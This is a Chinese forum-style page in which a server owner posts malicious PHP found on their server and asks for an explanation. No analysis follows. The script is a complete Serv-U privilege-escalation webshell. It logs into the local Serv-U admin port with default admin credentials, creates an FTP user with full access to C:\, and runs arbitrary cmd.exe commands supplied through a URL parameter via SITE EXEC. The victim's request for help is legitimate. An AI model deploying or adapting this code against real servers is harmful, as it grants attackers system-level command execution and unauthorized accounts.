概述
解读 PHP恶意代码
我的服务器被人传了恶意代码,我看了,看不懂,有谁可以帮我分析一下??
//
//Codez begin
//
//判断magic_quotes_gpc的值
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
}
//变量初始化
$addr = '0.0.0.0';
$ftpport = 21;
$adminport = 43958;
$adminuser = 'LocalAdministrator';
$adminpass = '#l@$ak#.lk;0@P';
$user = 'suber';
$password = '1234567890';
$homedir = 'C:\';
$dir = 'C:\WINNT\System32\';
//有改变则赋值
if ($_GET){
$addr = $_GET['addr'] ;
$ftpport = $_GET['ftpport'] ;
$adminport = $_GET['adminport'] ;
$adminuser = $_GET['adminuser'] ;
$adminpass = $_GET['adminpass'] ;
$user = $_GET['user'] ;
$password = $_GET['password'] ;
$homedir = $_GET['homedir'] ;
if ($_GET['dir']){
$dir = $_GET['dir'] ;
}
}
?>
SUU1.5b {font-family : Verdana, sans-serif;font-size : 14px;}
body,td,p,pre {
font-family : Verdana, sans-serif;font-size : 12px;
}
input {
font-family: "Verdana";
font-size: "11px";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
}
添加Serv-U用户部分
| 主机IP: | |
| 主机Ftp端口: | |
| 主机Ftp管理端口: | |
| 主机Ftp管理用户: | |
| 主机Ftp管理密码: | |
| 添加的用户名: | |
| 添加的用户名密码: | |
| 用户主目录(别忘了写""): | |
命令回显:
//添加用户
if ($_GET['action']=="up"){
up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir);
}
?>
| 主机Ftp端口: | |
| 用户名: | |
| 用户名密码: | |
| 系统路径(别忘了写""): | |
| 执行的命令: | |
命令回显:
//执行命令
if ($_GET['action']=="execute"){
ftpcmd($ftpport,$user,$password,$dir,$_GET['cmd']);
}
?>
//添加用户主函数定义
function up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir){
$fp = fsockopen ("127.0.0.1", $adminport, $errno, $errstr, 8);
if (!$fp) {
echo "$errstr ($errno)
n";
} else {
fputs ($fp, "USER ".$adminuser."rn");
sleep (1);
fputs ($fp, "PASS ".$adminpass."rn");
sleep (1);
fputs ($fp, "SITE MAINTENANCErn");
sleep (1);
fputs ($fp, "-SETUSERSETUPrn");
fputs ($fp, "-IP=".$addr."rn");
fputs ($fp, "-PortNo=".$ftpport."rn");
fputs ($fp, "-User=".$user."rn");
fputs ($fp, "-Password=".$password."rn");
fputs ($fp, "-HomeDir=".$homedir."rn");
fputs ($fp, "-LoginMesFile=rn");
fputs ($fp, "-Disable=0rn");
fputs ($fp, "-RelPaths=0rn");
fputs ($fp, "-NeedSecure=0rn");
fputs ($fp, "-HideHidden=0rn");
fputs ($fp, "-AlwaysAllowLogin=0rn");
fputs ($fp, "-ChangePassword=1rn");
fputs ($fp, "-QuotaEnable=0rn");
fputs ($fp, "-MaxUsersLoginPerIP=-1rn");
fputs ($fp, "-SpeedLimitUp=-1rn");
fputs ($fp, "-SpeedLimitDown=-1rn");
fputs ($fp, "-MaxNrUsers=-1rn");
fputs ($fp, "-IdleTimeOut=600rn");
fputs ($fp, "-SessionTimeOut=-1rn");
fputs ($fp, "-Expire=0rn");
fputs ($fp, "-RatioUp=1rn");
fputs ($fp, "-RatioDown=1rn");
fputs ($fp, "-RatiosCredit=0rn");
fputs ($fp, "-QuotaCurrent=0rn");
fputs ($fp, "-QuotaMaximum=0rn");
fputs ($fp, "-Maintenance=Systemrn");
fputs ($fp, "-PasswordType=Regularrn");
fputs ($fp, "-Ratios=Nonern");
fputs ($fp, " Access=".$homedir."|RWAMELCDPrn");
fputs ($fp, "QUITrn");
sleep (1);
while (!feof($fp)) {
echo fgets ($fp,128);
}
}
}
//执行命令主函数定义
function ftpcmd($ftpport,$user,$password,$dir,$cmd){
$conn_id = fsockopen ("127.0.0.1", $ftpport, $errno, $errstr, 8);
if (!$conn_id) {
echo "$errstr ($errno)
n";
} else {
fputs ($conn_id, "USER ".$user."rn");
sleep (1);
fputs ($conn_id, "PASS ".$password."rn");
sleep (1);
fputs ($conn_id, "SITE EXEC ".$dir."cmd.exe /c ".$cmd."rn");
fputs ($conn_id, "QUITrn");
sleep (1);
while (!feof($conn_id)) {
echo fgets ($conn_id,128);
}
fclose($conn_id);
}
}
//去除转义字符
function stripslashes_array(&$array) {
while (list($key,$var) = each($array)) {
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
?>
最后
以上就是温柔小丸子为你收集整理的php 恶意代码分析,解读 PHP恶意代码的全部内容,希望文章能够帮你解决php 恶意代码分析,解读 PHP恶意代码所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
发表评论 取消回复